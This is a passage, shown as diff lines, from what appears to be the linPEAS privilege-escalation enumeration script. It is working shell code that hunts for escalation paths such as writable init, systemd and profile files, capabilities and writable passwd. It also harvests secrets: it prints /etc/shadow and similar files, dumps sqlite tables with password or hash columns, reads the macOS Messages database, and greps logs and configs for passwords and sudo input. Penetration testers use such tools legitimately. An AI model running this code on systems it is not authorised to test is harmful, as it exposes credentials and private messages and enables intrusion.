"s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; - fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - fi - done - echo "" - fi - fi - done - fi - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" - fi - - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" - - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" - - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" - - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done - echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" - - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE 